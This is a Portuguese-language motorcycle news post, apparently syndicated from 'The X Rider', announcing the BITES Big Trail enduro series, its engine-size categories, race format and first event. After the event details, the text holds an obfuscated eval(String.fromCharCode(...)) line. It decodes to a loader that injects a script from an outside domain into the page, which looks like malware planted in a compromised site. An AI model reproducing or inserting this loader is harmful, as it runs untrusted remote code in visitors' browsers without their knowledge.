Tire todas suas dúvidas sobre o BITES: Big Trails Enduro Series!

0
98
Tire todas suas dúvidas sobre o BITES: Big Trails Enduro Series!

Tire todas suas dúvidas sobre o BITES: Big Trails Enduro Series!

Big Trail Enduro Series chega como alternativa aos proprietários de Big Trails de todas as cilindradas apaixonados pelo uso Off

O BITES anunciou seu calendário com 5 etapas e será válido pelo, inédito, campeonato brasileiro de Big Trail. Com três etapas em São Paulo, uma em Minas e outra em Cuiabá, a série contará com 3 categorias destinada a competidores divididas por cc e a categoria Turismo, onde o piloto seguirá por uma trilha guiada.

 

 

 

Um movimento crescente entre proprietários de Big Trail vem chamando atenção. Está cada vez mais comum ver a presença dessas motos nas trilhas e até em competições. O público brasileiro começa a descobrir um novo universo, proporcionado por essas gigantes valentes.

“Quando participei do GS Trophy em 2019, ao final pude perceber que muitos ali estavam se sentindo órfãos. A maioria desejava uma nova competição! Foi então que em um bate papo com Vincenzo Barbagallo, diretor do Hard Enduro Brasil Series, surgiu a ideia de fazer o BITES.” comenta Gustavo Narciso, organizador do BITES.

O campeonato acontecerá junto ao HEBS, mas os organizadores garantem que não será um Hard Enduro para Big Trails.

“Lançaremos mão de toda expertise adquirida nesses 4 anos de Hard Enduro para fazer um campeonato inédito e sem muitos erros, naturais em todo começo. A possibilidade de utilizar a mesma estrutura do HEBS, nos deu a segurança de lançar um campeonato sem mesmo ter fechado patrocínio master! Atualmente, apenas a Mitas Pneus está nos patrocinando. Mas estamos conversando com outros possíveis patrocinadores, para que possamos melhorar e evoluir o campeonato.” enfatiza Vincenzo Barbagallo, diretor do HEBS/BITES.

Categorias

O BITES será dividido em 4 categorias, onde três são separadas por cilindradas e uma voltada para pilotos que desejam tem uma experiência off Road, mas sem a pressão de correr uma prova.

Dentre as categorias voltadas para competição, a novidade foi a criação da Big Light, destinada as motos de 250cc até 599cc, contemplando as menores não consideradas Big Trails, mas muito utilizadas como porta de entrada neste mundo.

A categoria Big será destinada a motos de 600cc até 750cc e promete ser uma categoria mais disputada.

Um pouco mais acima, vem a categoria de 751cc até 1000cc, a Big Pró. Com boa altura do solo, como as G850GS e as suspensões robustas das Africa Twin, certamente um palpite de qual leva a melhor será apenas um chute.

Para as Maxxi Trails fora criado a categoria Heavy Pró, para motos acima de 1001cc. Com motores bicilíndrico, tricilíndrico ou até mesmo os motores boxer, somados ao grande peso, serão um desafio a mais aos pilotos competidores.

“Sou motociclista a mais de 20 anos e comecei no Enduro. Atualmente tenho uma GS 1200 e me divirto andando nas trilhas. Pensamos muito na hora de dividir as categorias e acreditamos estar no caminho certo, mesmo sabendo que não é possível agradar a todos.” conclui Matheus Cancillieri, organizador do BITES.

A categoria Turismo, destina-se aos entusiastas do Off Road que desejam levar suas Big Trails para as trilhas, mas sem a pressão de uma competição. Para estes, os organizadores irão promover uma trilha guiada passando por lugares únicos e podendo assistir de perto as disputas do HEBS e BITES.

Formato do campeonato

Para as categorias Big Light, Big, Big Pró e Heavy Pró, as disputas começam no sábado, com a realização de um Prólogo em circuito fechado. Os pilotos serão desafiados em um circuito de obstáculos, pensados para as Big trails que definirão as ordens de largada para o dia seguinte.

“O prólogo é o momento onde o público pode se aproximar do piloto e das marcas presentes. Durante as etapas do HEBS ano passado, o público marcou presença, gerando uma mídia espontânea, favorecendo o crescimento do campeonato e a visibilidade dos patrocinadores. Como a estrutura será a mesma, acredito que tudo isso será ainda maior com a entrada do BITES.” ressalta Gustavo Narciso.

Para o domingo os pilotos irão enfrentar as trilhas em uma disputa contra o relógio. O trajeto será levantado pelos organizadores de cada etapa do campeonato, pensados exclusivamente para as Big Trails e posteriormente testados pela organização. Com trajetos sinalizados, o uso de GPS Navegador será facultativo. Mas o piloto que desejar, poderá se utilizar desse recurso tecnológico, tendo em vista minimizar os erros.

Serviço

Local Barão de Cocais
Data 21 e 22 de Março
Valor 250,00
Inscrição chronusae.com.br
Contato 19974028512

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));

O post Tire todas suas dúvidas sobre o BITES: Big Trails Enduro Series! apareceu primeiro em The X Rider.

Veja mais em The X Rider